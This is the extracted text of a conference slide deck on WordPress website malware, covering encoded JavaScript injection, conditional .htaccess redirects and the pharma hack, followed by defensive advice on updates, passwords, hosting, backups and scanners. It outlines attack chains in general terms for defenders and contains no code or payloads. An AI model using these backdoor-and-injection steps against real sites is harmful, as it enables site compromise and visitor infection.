why my website sells viagra

DRE ARMEDA,CISSP

@DREMEDA

2

CO-FOUNDER AT SUCURI SECURITYORGANIZER, WORDCAMP SAN DIEGO12 YEAR NAVY VETERAN1ST WORDPRESS THEME IN 2005LOVES TACOSDIEHARD CHARGERS FANRIDES A HARLEY

SUCURI.NETDRE.IM

3

THE WEB IS GROWING

4

Over 2 Billion internet users today. 480% growth in the last 11 years. (Internet World Stats)

300 million websites were added to the internet in 2011 (Pingdom)

100,000+ domains gained weekly (Global Domain Registry)

INNOVATION & CREATIVITY

5

6

7

8

9

ITS NOT ALL PEACHY

10

11

WHAT IS MALWARE?

12

SEO spam, JavaScript & iFrame attacks, and malicious redirects are a couple web-based malware examples.

Malware, short for malicious software, is a software designed to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems.

ATTACKERS LOVE YOU

14

Monitor your web browsing and internet usageForced advertisingRedirect affiliate marketing revenue

HOW BAD IS IT?

15

Over 2 million new malware strings monthly (McAfee)

Cost to US consumers alone = over $2.3 billion in 2010. (Consumer Reports)

Google Safe Browsing issues over 3 million malware warnings a day. (Google)

16

ENCODED JAVASCRIPT17

Impact: Website pages may be used to serve malicious downloads to visitors. Downloads may be used to infect desktop computers, and/or exploit FTP info.

Typical Entry Point: Outdated, known vulnerable software; exploited desktop computers; exploited FTP credentials.

JavaScript that is obfuscated(hidden) so that you can’t tell what it is. It is injected into files/pages on the site and used to serve malware.

ENCODED JAVASCRIPT18

/wp-admin/js/cat.js – CLEAN

ENCODED JAVASCRIPT19

/wp-admin/js/cat.js – INFECTED

ENCODED JAVASCRIPT20

/wp-admin/js/cat.js – INFECTION DECODED – Somewhat

ENCODED JAVASCRIPT

1. Attacker scans for known vulnerable software (Old WordPress installations, plugins, themes). Attack stems from exploited desktop which steals FTP information.

2. Backdoor file inserted into the environment. This gives the attacker remote access into your world

3. Payload inserted into various Javascript files and/or encoded and hidden in theme, plugin files.

4. You’ve just enabled your visitors to load fake anti-virus and other cool downloads from your site

How it works:

ENCODED JAVASCRIPT

Encoded JavaScript Resources:

http://www.schillmania.com/content/entries/2009/javascript-malware-obfuscation-

analysishttp://www.slideshare.net/yusufmotiwala/reverse-engineering-malicious-

javascripthttp://www.infosecisland.com/videos-view/19101-Malware-Analysis-How-to-Decode-JavaScript-

Obfuscation.html

QUICK TIP: Check Google to see if you’re infected - site:{yourdomain.com} viagra

CONDITIONAL REDIRECTS23

Impact: When traffic is coming from a specific referrer (i.e. Google, Bing), the site is redirected to a malicious website.Typical Entry Point: Outdated, known vulnerable software.

An attack the causes a website to redirect to a malicious website based on referrer, web browser, operating system.

CONDITIONAL REDIRECTS24

Infected .htaccess file:

CONDITIONAL REDIRECTS25

Result of conditional redirect:

CONDITIONAL REDIRECTS

1. Attacker scans for known vulnerable software (Old WordPress installations, plugins, themes).

2. Backdoor file inserted into the environment. This gives the attacker remote access into your world

3. .htaccess file entries are created to load redirected. Encoded redirect code can also be added to index files.

4. You’re now redirecting to some cool malware awesomeness.

How it works:

CONDITIONAL REDIRECTS

Conditional Redirects Resources:

http://blog.sucuri.net/2011/11/the-new-and-old-htaccess-attacks-now-using-in-

domains.htmlhttp

://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html

http://sucuri.net/malware-update-timthumb-php-and-htaccess-redirection.html

PHARMA HACK28

Impact: Website page and post titles, descriptions and links are changed to display pharmaceutical ads and links back to malicious websites on search engine result pages.

Typical Entry Point: Outdated, known vulnerable software.

Pharma Hack is a type of SEO poisoning. Attackers manipulate their search engine results to make their links appear higher than legitimate results.

PHARMA HACK29

Results of scanning rendered source.:

PHARMA HACKGoogle Search Engine Results:

PHARMA HACK

1. Attacker scans for known vulnerable software (Old WordPress installations, plugins, themes)

2. Backdoor file inserted into the environment. This gives the attacker remote access into your world

3. Control file is inserted into core application or plugin files. This file acts as a connection from the backdoor to the database.

4. Payload is dropped into the database and Viva Viagra!

How it works:

QUICK TIP: Check Google to see if you’re infected - site:{yourdomain.com} viagra

PHARMA HACK

Pharma Hack Resources:

http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-

wordpress.htmlhttp://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-

hack.htmlhttp://www.pearsonified.com/2010/04/wordpress-

pharma-hack.phphttp://wpdude.com/refreshing-google-index-after-

pharma-hackQUICK TIP: Check Google to see if you’re infected - site:{yourdomain.com} viagra

33

WHAT IS SECURITY?

PROTECTING THINGS OF VALUE FROM HARM’S WAY.

HOW & WHY35

AM I SECURE

The percentage of risk can never be 0!

The name of the game is minimizing risk.

LOCAL MACHINE

Ensure your local machine stays updated

Use an Anti-Virus solution & enable auto-updatesMac – Sophos Anti-Virus for Mac Home EditionWindows - AVG Anti-Virus Free

Don’t store server credentials on your local machine

CONNECT TO YOUR SITE

Consider using sFTP or SSH instead of FTP.

If you’re stuck with FTP:

Deny anonymous loginLimit connections

Practice least privilege

Don’t store server credentials on your local machine

PASSWORDS

Change them oftenDon’t write them down, or share them

Passwords are like toothbrushes, you should keep them to yourself. And discard them, and get a new one, if they have been used by others.

Don’t use the same password across all your accounts

Use a password manager

KeePass Password SafeLastPass1Password

WHO HOSTS YOU?

CHEAP DOES NOT ALWAYS MEAN BEST, OR SAFEST!

DO YOUR RESEACH!

What software are they running? How often do they update?

How are server and support credentials stored & who has access? Are they 1 in the same?

What is their malware remediation process?How many sites have been infected?

http://www.google.com/safebrowsing/diagnostic?site=google.com

GARAGE CLEANING

IF YOU’RE NOT USING IT, REMOVE IT!

UPDATE UPDATE UPDATE UPDATE UPDATEOnly load what’s needed to get your job done.Check your file and directory permissions.Remove user accounts! – Practice least privilege.Have you changed your password lately?UPDATE UPDATE UPDATE UPDATE UPDATE

43

BACKUP YOUR WEBSITE

NO BACKUPS = BOOOOO!

BackupBuddy - http://pluginbuddy.com/backupbuddy/

VaultPress – http://vaultpress.com

MALWARE SCAN

IS YOUR SITE INFECTED?

Unmask Parasites – http://unmaskparasites.comSucuri SiteCheck – http://sitecheck.sucuri.net

MALWARE CLEAN UP

IS YOUR SITE INFECTED?

VaultPress – http://vaultpress.comSucuri Security – http://sucuri.net

WORDPRESS PLUGINS

WordPress Exploit ScannerBulletProof SecurityLogin LockdownSucuri SiteCheck Malware Scanner